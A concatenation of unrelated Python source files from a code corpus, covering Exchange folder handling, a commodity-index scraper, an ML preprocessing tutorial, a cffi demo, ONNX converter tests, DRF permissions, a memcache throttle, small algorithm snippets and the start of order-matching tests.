class System(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'System',),
}
class TemporarySaves(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'TemporarySaves',),
}
class Views(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Views',),
}
class WorkingSet(NonDeleteableFolderMixin, Folder):
LOCALIZED_NAMES = {
None: (u'Working Set',),
}
class RootOfHierarchy(Folder):
# A list of wellknown, or "distinguished", folders that belong in this folder hierarchy. See
# http://msdn.microsoft.com/en-us/library/microsoft.exchange.webservices.data.wellknownfoldername(v=exchg.80).aspx
# and https://msdn.microsoft.com/en-us/library/office/aa580808(v=exchg.150).aspx
# 'RootOfHierarchy' subclasses must not be in this list.
WELLKNOWN_FOLDERS = []
TRAVERSAL_DEPTH = DEEP
# A special folder that acts as the top of a folder hierarchy. Finds and caches subfolders at arbitrary depth.
def __init__(self, **kwargs):
self.account = kwargs.pop('account', None) # A pointer back to the account holding the folder hierarchy
if kwargs.pop('root', None):
raise ValueError("RootOfHierarchy folders do not have a root")
kwargs['root'] = self
super(RootOfHierarchy, self).__init__(**kwargs)
self._subfolders = None # See self._folders_map()
def refresh(self):
self._subfolders = None
super(RootOfHierarchy, self).refresh()
def get_folder(self, folder_id):
return self._folders_map.get(folder_id, None)
def add_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
self._folders_map[folder.id] = folder
def update_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
self._folders_map[folder.id] = folder
def remove_folder(self, folder):
if not folder.id:
raise ValueError("'folder' must have an ID")
try:
del self._folders_map[folder.id]
except KeyError:
pass
def clear_cache(self):
self._subfolders = None
def get_children(self, folder):
for f in self._folders_map.values():
if not f.parent:
continue
if f.parent.id == folder.id:
yield f
@classmethod
def get_distinguished(cls, account):
"""Gets the distinguished folder for this folder class"""
if not cls.DISTINGUISHED_FOLDER_ID:
raise ValueError('Class %s must have a DISTINGUISHED_FOLDER_ID value' % cls)
folders = list(FolderCollection(
account=account,
folders=[cls(account=account, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)]
).get_folders()
)
if not folders:
raise ErrorFolderNotFound('Could not find distinguished folder %s' % cls.DISTINGUISHED_FOLDER_ID)
if len(folders) != 1:
raise ValueError('Expected result length 1, but got %s' % folders)
folder = folders[0]
if isinstance(folder, Exception):
raise folder
if folder.__class__ != cls:
raise ValueError("Expected 'folder' %r to be a %s instance" % (folder, cls))
return folder
def get_default_folder(self, folder_cls):
# Returns the distinguished folder instance of type folder_cls belonging to this account. If no distinguished
# folder was found, try as best we can to return the default folder of type 'folder_cls'
if not folder_cls.DISTINGUISHED_FOLDER_ID:
raise ValueError("'folder_cls' %s must have a DISTINGUISHED_FOLDER_ID value" % folder_cls)
# Use cached distinguished folder instance, but only if cache has already been prepped. This is an optimization
# for accessing e.g. 'account.contacts' without fetching all folders of the account.
if self._subfolders:
for f in self._folders_map.values():
# Require exact class, to not match subclasses, e.g. RecipientCache instead of Contacts
if f.__class__ == folder_cls and f.is_distinguished:
log.debug('Found cached distinguished %s folder', folder_cls)
return f
try:
log.debug('Requesting distinguished %s folder explicitly', folder_cls)
return folder_cls.get_distinguished(root=self)
except ErrorAccessDenied:
# Maybe we just don't have GetFolder access? Try FindItems instead
log.debug('Testing default %s folder with FindItem', folder_cls)
fld = folder_cls(root=self, name=folder_cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)
fld.test_access()
return self._folders_map.get(fld.id, fld) # Use cached instance if available
except ErrorFolderNotFound:
# The Exchange server does not return a distinguished folder of this type
pass
raise ErrorFolderNotFound('No useable default %s folders' % folder_cls)
@property
def _folders_map(self):
if self._subfolders is not None:
return self._subfolders
# Map root, and all subfolders of root, at arbitrary depth by folder ID. First get distinguished folders, so we
# are sure to apply the correct Folder class, then fetch all subfolders of this root. AdminAuditLogs folder is
# not retrievable and makes the entire request fail.
folders_map = {self.id: self}
distinguished_folders = [
cls(root=self, name=cls.DISTINGUISHED_FOLDER_ID, is_distinguished=True)
for cls in self.WELLKNOWN_FOLDERS
if cls != AdminAuditLogs and cls.supports_version(self.account.version)
]
try:
for f in FolderCollection(account=self.account, folders=distinguished_folders).get_folders():
if isinstance(f, (ErrorFolderNotFound, ErrorNoPublicFolderReplicaAvailable)):
# This is just a distinguished folder the server does not have
continue
if isinstance(f, ErrorInvalidOperation):
# This is probably a distinguished folder the server does not have. We previously tested the exact
# error message (f.value), but some Exchange servers return localized error messages, so that's not
# possible to do reliably.
continue
if isinstance(f, ErrorItemNotFound):
# Another way of telling us that this is a distinguished folder the server does not have
continue
if isinstance(f, Exception):
raise f
folders_map[f.id] = f
for f in FolderCollection(account=self.account, folders=[self]).find_folders(depth=self.TRAVERSAL_DEPTH):
if isinstance(f, Exception):
raise f
if f.id in folders_map:
# Already exists. Probably a distinguished folder
continue
folders_map[f.id] = f
except ErrorAccessDenied:
# We may not have GetFolder or FindFolder access
pass
self._subfolders = folders_map
return folders_map
@classmethod
def from_xml(cls, elem, account):
# fld_type = re.sub('{.*}', '', elem.tag)
fld_id_elem = elem.find(FolderId.response_tag())
fld_id = fld_id_elem.get(FolderId.ID_ATTR)
changekey = fld_id_elem.get(FolderId.CHANGEKEY_ATTR)
kwargs = {f.name: f.from_xml(elem=elem, account=account) for f in cls.supported_fields()}
if not kwargs['name']:
# Some folders are returned with an empty 'DisplayName' element. Assign a default name to them.
# TODO: Only do this if we actually requested the 'name' field.
kwargs['name'] = cls.DISTINGUISHED_FOLDER_ID
cls._clear(elem)
return cls(account=account, id=fld_id, changekey=changekey, **kwargs)
@classmethod
def folder_cls_from_folder_name(cls, folder_name, locale):
"""Returns the folder class that matches a localized folder name.
locale is a string, e.g. 'da_DK'
"""
for folder_cls in cls.WELLKNOWN_FOLDERS + NON_DELETEABLE_FOLDERS:
if folder_name.lower() in folder_cls.localized_names(locale):
return folder_cls
raise KeyError()
def __repr__(self):
# Let's not create an infinite loop when printing self.root
return self.__class__.__name__ + \
repr((self.account, '[self]', self.name, self.total_count, self.unread_count, self.child_folder_count,
self.folder_class, self.id, self.changekey))
class Root(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'root'
WELLKNOWN_FOLDERS = [
AdminAuditLogs,
Calendar,
Conflicts,
Contacts,
ConversationHistory,
DeletedItems,
Directory,
Drafts,
Favorites,
IMContactList,
Inbox,
Journal,
JunkEmail,
LocalFailures,
MsgFolderRoot,
MyContacts,
Notes,
Outbox,
PeopleConnect,
QuickContacts,
RecipientCache,
RecoverableItemsDeletions,
RecoverableItemsPurges,
RecoverableItemsRoot,
RecoverableItemsVersions,
SearchFolders,
SentItems,
ServerFailures,
SyncIssues,
Tasks,
ToDoSearch,
VoiceMail,
]
@property
def tois(self):
# 'Top of Information Store' is a folder available in some Exchange accounts. It usually contains the
# distinguished folders belonging to the account (inbox, calendar, trash etc.).
return self.get_default_folder(MsgFolderRoot)
def get_default_folder(self, folder_cls):
try:
return super(Root, self).get_default_folder(folder_cls)
except ErrorFolderNotFound:
pass
        # Try to pick a suitable default folder. We do this by:
        # 1. Searching the full folder list for a folder with the distinguished folder name
        # 2. Searching TOIS for a direct child folder of the same type that is marked as distinguished
        # 3. Searching TOIS for a direct child folder of the same type that has a localized name
        # 4. Searching root for a direct child folder of the same type that is marked as distinguished
        # 5. Searching root for a direct child folder of the same type that has a localized name
log.debug('Searching default %s folder in full folder list', folder_cls)
for f in self._folders_map.values():
# Require exact class to not match e.g. RecipientCache instead of Contacts
if f.__class__ == folder_cls and f.has_distinguished_name:
log.debug('Found cached %s folder with default distinguished name', folder_cls)
return f
# Try direct children of TOIS first. TOIS might not exist.
try:
return self._get_candidate(folder_cls=folder_cls, folder_coll=self.tois.children)
except ErrorFolderNotFound:
            # No candidates, or TOIS does not exist
pass
# No candidates in TOIS. Try direct children of root.
return self._get_candidate(folder_cls=folder_cls, folder_coll=self.children)
def _get_candidate(self, folder_cls, folder_coll):
        # Get the single folder of the same type in folder_coll
same_type = [f for f in folder_coll if f.__class__ == folder_cls]
are_distinguished = [f for f in same_type if f.is_distinguished]
if are_distinguished:
candidates = are_distinguished
else:
candidates = [f for f in same_type if f.name.lower() in folder_cls.localized_names(self.account.locale)]
if candidates:
if len(candidates) > 1:
raise ValueError(
'Multiple possible default %s folders: %s' % (folder_cls, [text_type(f.name) for f in candidates])
)
if candidates[0].is_distinguished:
log.debug('Found cached distinguished %s folder', folder_cls)
else:
log.debug('Found cached %s folder with localized name', folder_cls)
return candidates[0]
raise ErrorFolderNotFound('No useable default %s folders' % folder_cls)
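# Editor-added sketch (hedged): how the default-folder resolution above is
# typically exercised from application code. This assumes the surrounding
# module is part of an exchangelib-style package whose top level exposes
# Account and Credentials; the address and password below are placeholders.
def _example_default_folder_lookup():
    from exchangelib import Account, Credentials  # assumed public API
    account = Account(
        primary_smtp_address='user@example.com',
        credentials=Credentials('user@example.com', 'password'),
        autodiscover=True,
    )
    # Falls back through the cache / TOIS / root strategies implemented in
    # Root.get_default_folder() above.
    return account.root.get_default_folder(Calendar)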
class PublicFoldersRoot(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'publicfoldersroot'
TRAVERSAL_DEPTH = SHALLOW
supported_from = EXCHANGE_2007_SP1
def get_children(self, folder):
# EWS does not allow deep traversal of public folders, so self._folders_map will only populate the top-level
# subfolders. To traverse public folders at arbitrary depth, we need to get child folders on demand.
# Let's check if this folder already has any cached children. If so, assume we can just return those.
children = list(super(PublicFoldersRoot, self).get_children(folder=folder))
if children:
# Return a generator like our parent does
for f in children:
yield f
return
# Also return early if the server told us that there are no child folders.
if folder.child_folder_count == 0:
return
children_map = {}
try:
for f in FolderCollection(account=self.account, folders=[folder]).find_folders(depth=self.TRAVERSAL_DEPTH):
if isinstance(f, Exception):
raise f
children_map[f.id] = f
except ErrorAccessDenied:
# No access to this folder
pass
# Let's update the cache atomically, to avoid partial reads of the cache.
self._subfolders.update(children_map)
# Child folders have been cached now. Try super().get_children() again.
for f in super(PublicFoldersRoot, self).get_children(folder=folder):
yield f
class ArchiveRoot(RootOfHierarchy):
DISTINGUISHED_FOLDER_ID = 'archiveroot'
supported_from = EXCHANGE_2010_SP1
WELLKNOWN_FOLDERS = [
ArchiveDeletedItems,
ArchiveInbox,
ArchiveMsgFolderRoot,
ArchiveRecoverableItemsDeletions,
ArchiveRecoverableItemsPurges,
ArchiveRecoverableItemsRoot,
ArchiveRecoverableItemsVersions,
]
# Folders that return 'ErrorDeleteDistinguishedFolder' when we try to delete them. I can't find any official docs
# listing these folders.
NON_DELETEABLE_FOLDERS = [
AllContacts,
AllItems,
CalendarLogging,
CommonViews,
ConversationSettings,
DeferredAction,
ExchangeSyncData,
FreebusyData,
Friends,
GALContacts,
Location,
MailboxAssociations,
MyContactsExtended,
ParkedMessages,
Reminders,
RSSFeeds,
Schedule,
Sharing,
Shortcuts,
SpoolerQueue,
System,
TemporarySaves,
Views,
WorkingSet,
]
|
py | b403424f747f410612c42a078a34b18c4322e758 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2022/2/4 17:17
Desc: Yiwu Small Commodity Index (义乌小商品指数)
http://www.ywindex.com/Home/Product/index/
"""
import pandas as pd
import requests
from bs4 import BeautifulSoup
def index_yw(symbol: str = "月景气指数") -> pd.DataFrame:
"""
    Yiwu Small Commodity Index (义乌小商品指数)
http://www.ywindex.com/Home/Product/index/
:param symbol: choice of {"周价格指数", "月价格指数", "月景气指数"}
:type symbol: str
    :return: index data
:rtype: pandas.DataFrame
"""
name_num_dict = {
"周价格指数": 1,
"月价格指数": 3,
"月景气指数": 5,
}
url = "http://www.ywindex.com/Home/Product/index/"
res = requests.get(url)
soup = BeautifulSoup(res.text, "lxml")
table_name = (
soup.find_all(attrs={"class": "tablex"})[name_num_dict[symbol]]
.get_text()
.split("\n\n\n\n\n")[2]
.split("\n")
)
table_content = (
soup.find_all(attrs={"class": "tablex"})[name_num_dict[symbol]]
.get_text()
.split("\n\n\n\n\n")[3]
.split("\n\n")
)
if symbol == "月景气指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[
:, :5
]
table_df.columns = ['期数', '景气指数', '规模指数', '效益指数', '市场信心指数']
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['景气指数'] = pd.to_numeric(table_df['景气指数'])
table_df['规模指数'] = pd.to_numeric(table_df['规模指数'])
table_df['效益指数'] = pd.to_numeric(table_df['效益指数'])
table_df['市场信心指数'] = pd.to_numeric(table_df['市场信心指数'])
return table_df
elif symbol == "周价格指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[:, :6]
table_df.columns = table_name
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['价格指数'] = pd.to_numeric(table_df['价格指数'])
table_df['场内价格指数'] = pd.to_numeric(table_df['场内价格指数'])
table_df['网上价格指数'] = pd.to_numeric(table_df['网上价格指数'])
table_df['订单价格指数'] = pd.to_numeric(table_df['订单价格指数'])
table_df['出口价格指数'] = pd.to_numeric(table_df['出口价格指数'])
return table_df
elif symbol == "月价格指数":
table_df = pd.DataFrame([item.split("\n") for item in table_content]).iloc[:, :6]
table_df.columns = table_name
table_df['期数'] = pd.to_datetime(table_df['期数']).dt.date
table_df['价格指数'] = pd.to_numeric(table_df['价格指数'])
table_df['场内价格指数'] = pd.to_numeric(table_df['场内价格指数'])
table_df['网上价格指数'] = pd.to_numeric(table_df['网上价格指数'])
table_df['订单价格指数'] = pd.to_numeric(table_df['订单价格指数'])
table_df['出口价格指数'] = pd.to_numeric(table_df['出口价格指数'])
return table_df
if __name__ == "__main__":
index_yw_df = index_yw(symbol="周价格指数")
print(index_yw_df)
index_yw_df = index_yw(symbol="月价格指数")
print(index_yw_df)
index_yw_df = index_yw(symbol="月景气指数")
print(index_yw_df)
|
py | b403426abb66243ae6bd2e7a295d5e6c43fc4048 | # Source : https://www.hackerearth.com/practice/machine-learning/data-manipulation-visualisation-r-python/tutorial-data-manipulation-numpy-pandas-python/tutorial/?utm_campaign=&utm_medium=email&utm_source=miscellaneous
# predict if the salary of a given person is less than or more than 50K.
import pandas as pd
from sklearn import preprocessing
# load training data
train = pd.read_csv("../../data/train.csv")
# load test data
test = pd.read_csv("../../data/test.csv")
#check data set
train.info()
print ("The train data has",train.shape)
print ("The test data has",test.shape)
train.head()
# Checking for missing values
nans = train.shape[0] - train.dropna().shape[0]
print ("%d rows have missing values in the train data" %nans)
nand = test.shape[0] - test.dropna().shape[0]
print ("%d rows have missing values in the test data" %nand)
# which columns have missing values
print train.isnull().sum()
# Let's count the number of unique values from character variables
cat = train.select_dtypes(include=['O'])
cat.apply(pd.Series.nunique)
#Workclass
train.workclass.value_counts(sort=True)
train.workclass.fillna('Private',inplace=True)
#Occupation
train.occupation.value_counts(sort=True)
train.occupation.fillna('Prof-specialty',inplace=True)
#Native Country
train['native.country'].value_counts(sort=True)
train['native.country'].fillna('United-States',inplace=True)
print train.isnull().sum()
#check proportion of target variable
train.target.value_counts()/train.shape[0]
crosstab = pd.crosstab(train.education, train.target,margins=True)/train.shape[0]
print crosstab
#load sklearn and encode all object type variables
from sklearn import preprocessing
for x in train.columns:
if train[x].dtype == 'object':
lbl = preprocessing.LabelEncoder()
lbl.fit(list(train[x].values))
train[x] = lbl.transform(list(train[x].values))
print train.head()
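# Editor-added sketch (hedged): what LabelEncoder does to a single column,
# shown on a tiny stand-alone example; not part of the original tutorial.
_demo_lbl = preprocessing.LabelEncoder()
_demo_lbl.fit(['Private', 'Self-emp', 'Private', 'State-gov'])
# Classes are sorted alphabetically, so 'Private' -> 0, 'Self-emp' -> 1,
# 'State-gov' -> 2.
print _demo_lbl.transform(['Private', 'State-gov'])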
|
py | b40343a1108136dc58ca65b0e6722aa81c3ad08a |
referents = [] # list "object descriptor -> python object"
freelist = None
def store(x):
"Store the object 'x' and returns a new object descriptor for it."
global freelist
p = freelist
if p is None:
p = len(referents)
referents.append(x)
else:
freelist = referents[p]
referents[p] = x
return p
def discard(p):
"""Discard (i.e. close) the object descriptor 'p'.
Return the original object that was attached to 'p'."""
global freelist
x = referents[p]
referents[p] = freelist
freelist = p
return x
class Ref(object):
"""For use in 'with Ref(x) as ob': open an object descriptor
and returns it in 'ob', and close it automatically when the
'with' statement finishes."""
def __init__(self, x):
self.x = x
def __enter__(self):
self.p = p = store(self.x)
return p
def __exit__(self, *args):
discard(self.p)
def count_pyobj_alive():
result = len(referents)
p = freelist
while p is not None:
assert result > 0
result -= 1
p = referents[p]
return result
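# Editor-added sketch (hedged): pure-Python usage of the descriptor table
# above, independent of the cffi demo below.
def _example_ref_usage():
    alive_before = count_pyobj_alive()
    with Ref([1, 2, 3]) as p:
        assert referents[p] == [1, 2, 3]            # descriptor -> object
        assert count_pyobj_alive() == alive_before + 1
    assert count_pyobj_alive() == alive_before      # released on exit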
# ------------------------------------------------------------
if __name__ == '__main__':
import api
ffi = api.PythonFFI()
ffi.cdef("""
typedef int pyobj_t;
int sum_integers(pyobj_t p_list);
pyobj_t sum_objects(pyobj_t p_list, pyobj_t p_initial);
""")
@ffi.pyexport("int(pyobj_t)")
def length(p_list):
list = referents[p_list]
return len(list)
@ffi.pyexport("int(pyobj_t, int)")
def getitem(p_list, index):
list = referents[p_list]
return list[index]
@ffi.pyexport("pyobj_t(pyobj_t)")
def pyobj_dup(p):
return store(referents[p])
@ffi.pyexport("void(pyobj_t)")
def pyobj_close(p):
discard(p)
@ffi.pyexport("pyobj_t(pyobj_t, int)")
def pyobj_getitem(p_list, index):
list = referents[p_list]
return store(list[index])
@ffi.pyexport("pyobj_t(pyobj_t, pyobj_t)")
def pyobj_add(p1, p2):
return store(referents[p1] + referents[p2])
lib = ffi.verify("""
typedef int pyobj_t; /* an "object descriptor" number */
int sum_integers(pyobj_t p_list) {
        /* this is a demo function written in C, using the API
defined above: length() and getitem(). */
int i, result = 0;
int count = length(p_list);
for (i=0; i<count; i++) {
int n = getitem(p_list, i);
result += n;
}
return result;
}
pyobj_t sum_objects(pyobj_t p_list, pyobj_t p_initial) {
/* same as above, but keeps all additions as Python objects */
int i;
int count = length(p_list);
pyobj_t p1 = pyobj_dup(p_initial);
for (i=0; i<count; i++) {
pyobj_t p2 = pyobj_getitem(p_list, i);
pyobj_t p3 = pyobj_add(p1, p2);
pyobj_close(p2);
pyobj_close(p1);
p1 = p3;
}
return p1;
}
""")
with Ref([10, 20, 30, 40]) as p_list:
print lib.sum_integers(p_list)
with Ref(5) as p_initial:
result = discard(lib.sum_objects(p_list, p_initial))
print result
assert count_pyobj_alive() == 0
|
py | b40344e961895c0413b9d88b71525fe9e7be7d7d | import unittest
import numpy as np
from sklearn.datasets import load_iris
from sklearn.mixture import GaussianMixture, BayesianGaussianMixture
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import dump_data_and_model, TARGET_OPSET
class TestGaussianMixtureConverter(unittest.TestCase):
def _fit_model_binary_classification(self, model, data, **kwargs):
X = data.data
y = data.target
mid_point = len(data.target_names) / 2
y[y < mid_point] = 0
y[y >= mid_point] = 1
model.fit(X, y)
return model, X.astype(np.float32)
def _fit_model_multiclass_classification(self, model, data):
X = data.data
y = data.target
model.fit(X, y)
return model, X.astype(np.float32)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_mixture_binary_classification(self):
model, X = self._fit_model_binary_classification(
GaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnBinGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_bayesian_mixture_binary_classification(self):
model, X = self._fit_model_binary_classification(
BayesianGaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnBinBayesianGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_gaussian_mixture_multiclass(self):
model, X = self._fit_model_multiclass_classification(
GaussianMixture(), load_iris())
model_onnx = convert_sklearn(
model,
"gaussian_mixture",
[("input", FloatTensorType([None, X.shape[1]]))],
target_opset=TARGET_OPSET
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X,
model,
model_onnx,
basename="SklearnMclGaussianMixture",
allow_failure="StrictVersion(onnxruntime.__version__)"
"<= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_comp2(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2)
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_full(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='full')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Full",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_tied(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='tied')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Tied",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_diag(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='diag')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Diag",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_gaussian_mixture_spherical(self):
data = load_iris()
X = data.data
model = GaussianMixture(n_components=2, covariance_type='spherical')
model.fit(X)
model_onnx = convert_sklearn(model, "GM",
[("input", FloatTensorType([None, 4]))],
target_opset=TARGET_OPSET)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32)[40:60],
model,
model_onnx,
basename="GaussianMixtureC2Spherical",
intermediate_steps=True,
# Operator gemm is not implemented in onnxruntime
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2')",
)
if __name__ == "__main__":
unittest.main()
|
py | b403450c789f2b6793eaaa75fb2a08b85f77fa1c | '''
project.permissions
===================
Project / Global Custom Permissions for REST API
'''
import logging
from rest_framework import permissions
logger = logging.getLogger('test_logger')
class IsAuthorOrReadOnly(permissions.BasePermission):
"""
Custom permission to only allow owners of an object to edit it.
"""
def has_object_permission(self, request, view, obj):
# Read permissions are allowed to any request
if request.method in permissions.SAFE_METHODS:
return True
# Write permissions are only allowed to the owner of the snippet
return obj.author == request.user
class IsAdminOrReadOnly(permissions.BasePermission):
"""
    Custom permission to only allow admin/staff users to edit; everyone else gets read-only access.
"""
    def has_permission(self, request, view):
        # Read permissions are allowed to any request
if request.method in permissions.SAFE_METHODS:
logger.info("%s" % request.method)
return True
        # Write permissions are only allowed to staff or superuser accounts
return request.user.is_staff or request.user.is_superuser
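# Editor-added sketch (hedged): how a permission class like the ones above is
# normally attached to a DRF view; 'ExampleViewSet' is an illustrative name,
# not part of this project.
def _example_viewset_usage():
    from rest_framework import viewsets
    class ExampleViewSet(viewsets.ModelViewSet):
        permission_classes = (IsAuthorOrReadOnly,)
    return ExampleViewSet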
|
py | b4034571e8ba239f98358fad60d9d849e6bd9721 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import random
import time
from waterfall import waterfall_config
from google.appengine.api import memcache
_MEMCACHE_MASTER_DOWNLOAD_LOCK = 'master-download-lock-%s'
def WaitUntilDownloadAllowed(
master_name, timeout_seconds=90): # pragma: no cover
"""Waits until next download from the specified master is allowed.
Returns:
True if download is allowed to proceed.
    False if download is still not allowed when the given timeout occurs.
"""
client = memcache.Client()
key = _MEMCACHE_MASTER_DOWNLOAD_LOCK % master_name
deadline = time.time() + timeout_seconds
download_interval_seconds = (
waterfall_config.GetDownloadBuildDataSettings().get(
'download_interval_seconds'))
memcache_master_download_expiration_seconds = (
waterfall_config.GetDownloadBuildDataSettings().get(
'memcache_master_download_expiration_seconds'))
while True:
info = client.gets(key)
if not info or time.time() - info['time'] >= download_interval_seconds:
new_info = {
'time': time.time()
}
if not info:
success = client.add(
key, new_info, time=memcache_master_download_expiration_seconds)
else:
success = client.cas(
key, new_info, time=memcache_master_download_expiration_seconds)
if success:
logging.info('Download from %s is allowed. Waited %s seconds.',
master_name, (time.time() + timeout_seconds - deadline))
return True
if time.time() > deadline:
logging.info('Download from %s is not allowed. Waited %s seconds.',
master_name, timeout_seconds)
return False
logging.info('Waiting to download from %s', master_name)
time.sleep(download_interval_seconds + random.random())
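# Editor-added sketch (hedged): a typical call site for the throttle above.
# The master name is illustrative; callers skip or retry the download when
# False is returned.
def _ExampleThrottledDownload():
  if WaitUntilDownloadAllowed('chromium.linux', timeout_seconds=60):
    return 'proceed with the build-data download'
  return None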
|
py | b40346a7cc60296c6fd257e8ac4e76f7eb2d1195 | '''
Author: ZHAO Zinan
Created: 07-Nov-2018
22. Generate Parenthesis
'''
class Solution:
def generateParenthesis(self, n):
"""
:type n: int
:rtype: List[str]
"""
self.list = []
self._generateParenthesis('', n, n, n)
return self.list
def _generateParenthesis(self, string, left, right, n):
if len(string) >= n*2:
self.list.append(string)
if left:
self._generateParenthesis(string+'(', left-1, right, n)
if right > left:
self._generateParenthesis(string+')', left, right-1, n)
# test
if __name__ == '__main__':
solution = Solution()
print(solution.generateParenthesis(3))
print(len(solution.generateParenthesis(4))) # 14
|
py | b40347144bbf96e51f47d3fea7d32fe1ddab9947 | def primes_oneliner(N):
aux = {}
return [aux.setdefault(p, p) for p in range(2, N)
if 0 not in [p%d for d in aux if p>=d+d]]
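# Editor-added notes (hedged): the one-liner keeps every prime found so far as
# keys of 'aux' and admits p only when no previously found prime d with
# d + d <= p divides it, i.e. trial division by smaller primes. For example,
# primes_oneliner(20) == [2, 3, 5, 7, 11, 13, 17, 19].
def primes_trial_division(N):
    """A plainer equivalent of primes_oneliner, for comparison."""
    primes = []
    for p in range(2, N):
        if all(p % d for d in primes):
            primes.append(p)
    return primes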
|
py | b403473f9950720befffe46bd9e50aa43acba90b | from python.src.matching_engine import MatchingEngine
from python.src.order_book import OrderBook
from python.src.orders import LimitOrder
from python.src.orders import MarketOrder
from python.src.enums import OrderDirection
from python.src.enums import OrderStatus
from python.src.exceptions import InvalidOrderDirectionException
import pytest
def test_matching_engine_init():
matching_engine = MatchingEngine()
assert not matching_engine.order_books, "Test Failed: order_books should be empty"
assert not matching_engine.orders, "Test Failed: orders should be empty"
assert not matching_engine.processed_orders, "Test Failed: processed_orders should be empty"
pass
def test_matching_engine_can_match():
instrument_id = "AAPL"
quantity = 100
price = 10
limit_orders = [LimitOrder(instrument_id=instrument_id,
order_direction=OrderDirection.buy if i % 2 else OrderDirection.sell,
quantity=quantity,
price=price + (i if i % 2 else -i)) for i in range(10)]
matching_engine = MatchingEngine()
for order in limit_orders:
matching_engine.add_order(order)
matching_engine.match()
order_book = matching_engine.order_books[instrument_id]
assert len(
matching_engine.order_books) == 1, "Test Failed: There should be 1 order book"
assert not matching_engine.orders, "Test Failed: There should be no orders"
assert len(
matching_engine.processed_orders) == 10, "Test Failed: There should be 10 processed_orders"
assert not order_book.bids, "Test Failed: There should be no bids after complete matching"
assert not order_book.asks, "Test Failed: There should be no asks after complete matching"
assert order_book.best_bid is None, "Test Failed: best_bid should be empty"
assert order_book.best_ask is None, "Test Failed: best_ask should be empty"
assert len(
order_book.trades) == 5, "Test Failed: trades should have 5 orders"
assert len(
order_book.complete_orders) == 10, "Test Failed: complete_orders should have all orders"
assert not order_book.attempt_match, "Test Failed: attempt_match should be False"
pass
def test_matching_engine_can_add_orders():
instrument_id = "AAPL"
quantity = 100
